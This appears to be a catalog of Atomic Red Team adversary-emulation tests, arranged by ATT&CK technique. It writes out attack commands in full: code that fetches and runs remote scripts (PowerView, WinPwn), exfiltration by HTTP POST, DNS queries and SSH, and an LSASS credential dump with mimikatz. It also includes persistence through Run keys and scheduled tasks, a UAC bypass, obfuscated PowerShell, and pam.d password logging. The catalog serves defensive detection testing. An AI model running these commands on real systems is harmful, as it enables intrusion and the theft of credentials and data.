if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;

command_promptwindowsSystem Network Configuration Discovery (TrickBot Style)

ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts

powershellwindowsList Open Egress Ports

$ports = Get-content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    $test = new-object system.Net.Sockets.TcpClient
    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
    $totalports++ | Out-Null
    if ($test.Connected) {
        $result = "$port open" 
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -append $file
        $totalopen++ | Out-Null
    }
    else {
        $result = "$port closed" 
        Write-Host -ForegroundColor Red $result
        $totalclosed++ | Out-Null
        $result | Out-File -Encoding ASCII -append $file
    }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results

command_promptwindowsAdfind - Enumerate Active Directory Subnet Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}

command_promptwindowsQakbot Recon

"#{recon_commands}"

bashelevatedmacosList macOS Firewall Rules

sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

command_promptwindowsDNS Server Discovery Using nslookup

nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%

T1018 Remote System Discovery · 22 tests

command_promptwindowsRemote System Discovery - net

net view /domain
net view

command_promptwindowsRemote System Discovery - net group Domain Computers

net group "Domain Computers" /domain

command_promptwindowsRemote System Discovery - nltest

nltest.exe /dclist:#{target_domain}

command_promptwindowsRemote System Discovery - ping sweep

for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i

command_promptwindowsRemote System Discovery - arp

arp -a

shlinux, macosRemote System Discovery - arp nix

arp -a | grep -v '^?'

shlinux, macosRemote System Discovery - sweep

for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done

powershellelevatedwindowsRemote System Discovery - nslookup

$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}

command_promptelevatedwindowsRemote System Discovery - adidnsdump

"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}

command_promptwindowsAdfind - Enumerate Active Directory Computer Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}

command_promptwindowsAdfind - Enumerate Active Directory Domain Controller Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist

shlinuxRemote System Discovery - ip neighbour

ip neighbour show

shlinuxRemote System Discovery - ip route

ip route show

shlinuxRemote System Discovery - netstat

netstat -r | grep default

shlinuxRemote System Discovery - ip tcp_metrics

ip tcp_metrics show |grep --invert-match "^127\."

powershellwindowsEnumerate domain computers within Active Directory using DirectorySearcher

$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}

powershellwindowsEnumerate Active Directory Computers with Get-AdComputer

Get-AdComputer -Filter *

powershellwindowsEnumerate Active Directory Computers with ADSISearcher

([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()

powershellwindowsGet-DomainController with PowerView

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose

powershellwindowsGet-WmiObject to Enumerate Domain Controllers

try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }

command_promptwindowsRemote System Discovery - net group Domain Controller

net group /domain "Domain controllers"

powershellwindowsEnumerate Remote Hosts with Netscan

cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'

T1027 Obfuscated Files or Information · 11 tests

shmacos, linuxDecode base64 Data into Script

if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

powershellwindowsExecute base64-encoded PowerShell

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand

powershellwindowsExecute base64-encoded PowerShell from Windows Registry

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"

command_promptwindowsExecution from Compressed File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email

Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP

Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"

powershellwindowsObfuscated Command in PowerShell

$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

manualwindowsObfuscated Command Line using special Unicode characters

powershellelevatedwindowsSnake Malware Encrypted crmlog file

$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"

command_promptwindowsExecution from Compressed JScript File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"

powershellwindowsObfuscated PowerShell Command via Character Array

$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)

T1027.002 Software Packing · 4 tests

shlinuxBinary simply packed by UPX (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shlinuxBinary packed by UPX, with modified headers (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary simply packed by UPX

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary packed by UPX, with modified headers

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

T1027.013 Encrypted/Encoded File · 3 tests

powershellwindows, macos, linuxDecode Eicar File and Write to File

$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt

powershellwindows, macos, linuxDecrypt Eicar File and Write to File

$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt

bashlinux, macosPassword-Protected ZIP Payload Extraction and Execution

echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh

T1033 System Owner/User Discovery · 7 tests

command_promptwindowsSystem Owner/User Discovery

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt

shlinux, macosSystem Owner/User Discovery

users
w
who

powershellwindowsFind computers where user has session - Stealth mode (PowerView)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose

powershellwindowsUser Discovery With Env Vars PowerShell Script

[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append

powershellwindowsGetCurrent User with PowerShell Script

[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt

powershellwindowsSystem Discovery - SocGholish whoami

$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file

command_promptwindowsSystem Owner/User Discovery Using Command Prompt

set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%

T1036 Masquerading · 2 tests

powershellwindowsSystem File Copied to Unusual Location

copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null

powershellwindowsMalware Masquerading and Execution from Zip File

Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null

T1036.005 Match Legitimate Resource Name or Location · 3 tests

shmacos, linuxExecute a process from a directory masquerading as the current parent directory

mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"

powershellwindowsMasquerade as a built-in system executable

Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"

powershellelevatedwindowsMasquerading cmd.exe as VEDetector.exe

# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5

T1041 Exfiltration Over C2 Channel · 2 tests

powershellwindowsC2 Data Exfiltration

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

powershellwindowsText Based Data Exfiltration using DNS subdomains

$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}

T1046 Network Service Discovery · 12 tests

bashlinux, macosPort Scan

for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done

shelevatedlinux, macosPort Scan Nmap

sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}

powershellelevatedwindowsPort Scan NMap for Windows

nmap #{host_to_scan}

powershellwindowsPort Scan using python

python "#{filename}" -i #{host_ip}

powershellwindowsWinPwn - spoolvulnscan

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput

powershellwindowsWinPwn - MS17-10

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput

powershellwindowsWinPwn - bluekeep

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput

powershellwindowsWinPwn - fruit

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput

shcontainersNetwork Service Discovery for Containers

docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh

powershellwindowsPort-Scanning /24 Subnet with PowerShell

$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}

powershellelevatedwindowsRemote Desktop Services Discovery via PowerShell

Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"

shelevatedlinux, macosPort Scan using nmap (Port range)

nmap -Pn -sV -p #{port_range} #{host}

T1048 Exfiltration Over Alternative Protocol · 4 tests

shmacos, linuxExfiltration Over Alternative Protocol - SSH

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

shmacos, linuxExfiltration Over Alternative Protocol - SSH

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

powershellwindowsDNSExfiltration (doh)

Import-Module "#{ps_module}"
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}

bashmacos, linuxExfiltrate Data using DNS Queries via dig

dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com

T1053.005 Scheduled Task · 12 tests

command_promptelevatedwindowsScheduled Task Startup Script

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

command_promptwindowsScheduled task Local

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

command_promptelevatedwindowsScheduled task Remote

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

powershellwindowsPowershell Cmdlet Scheduled Task

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

powershellwindowsTask Scheduler via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

powershellelevatedwindowsWMI Invoke-CimMethod Scheduled Task

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

command_promptwindowsScheduled Task Executing Base64 Encoded Commands From Registry

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}

powershellelevatedwindowsImport XML Schedule Task with Hidden Attribute

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

powershellwindowsPowerShell Modify A Scheduled Task

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction

command_promptelevatedwindowsScheduled Task ("Ghost Task") via Registry Key Manipulation

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon

command_promptelevatedwindowsScheduled Task Persistence via CompMgmt.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc

command_promptelevatedwindowsScheduled Task Persistence via Eventviewer.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"

T1055 Process Injection · 13 tests

powershellwindowsShellcode execution via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"

command_promptwindowsRemote Process Injection in LSASS via mimikatz

"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"

powershellwindowsSection View Injection

$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"

powershellwindowsDirty Vanity process Injection

Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe" #{pid}

powershellelevatedwindowsRead-Write-Execute process Injection

$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address

powershellwindowsProcess Injection with Go using UuidFromStringA WinAPI

$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug

powershellwindowsProcess Injection with Go using EtwpCreateEtwThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug

powershellwindowsRemote Process Injection with Go using RtlCreateUserThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI (Natively)

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI (Natively)

$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug

powershellelevatedwindowsUUID custom process Injection

Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force

T1055.001 Dynamic-link Library Injection · 2 tests

powershellelevatedwindowsProcess Injection via mavinject.exe

$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
Stop-Process -processname notepad

powershellwindowsWinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')

T1055.012 Process Hollowing · 4 tests

powershellwindowsProcess Hollowing using PowerShell

. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose

powershellwindowsRunPE via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"

powershellwindowsProcess Hollowing in Go using CreateProcessW WinAPI

$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program "#{hollow_binary_path}" -debug

powershellwindowsProcess Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)

$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "#{hollow_binary_path}" -debug

T1056.001 Keylogging · 8 tests

powershellelevatedwindowsInput Capture

&"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath #{filepath}

shelevatedlinuxLiving off the land Terminal Input Capture on Linux with pam.d

if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth

shelevatedlinuxLogging bash history to syslog

PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog

shelevatedlinuxLogging sh history to syslog/messages

PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
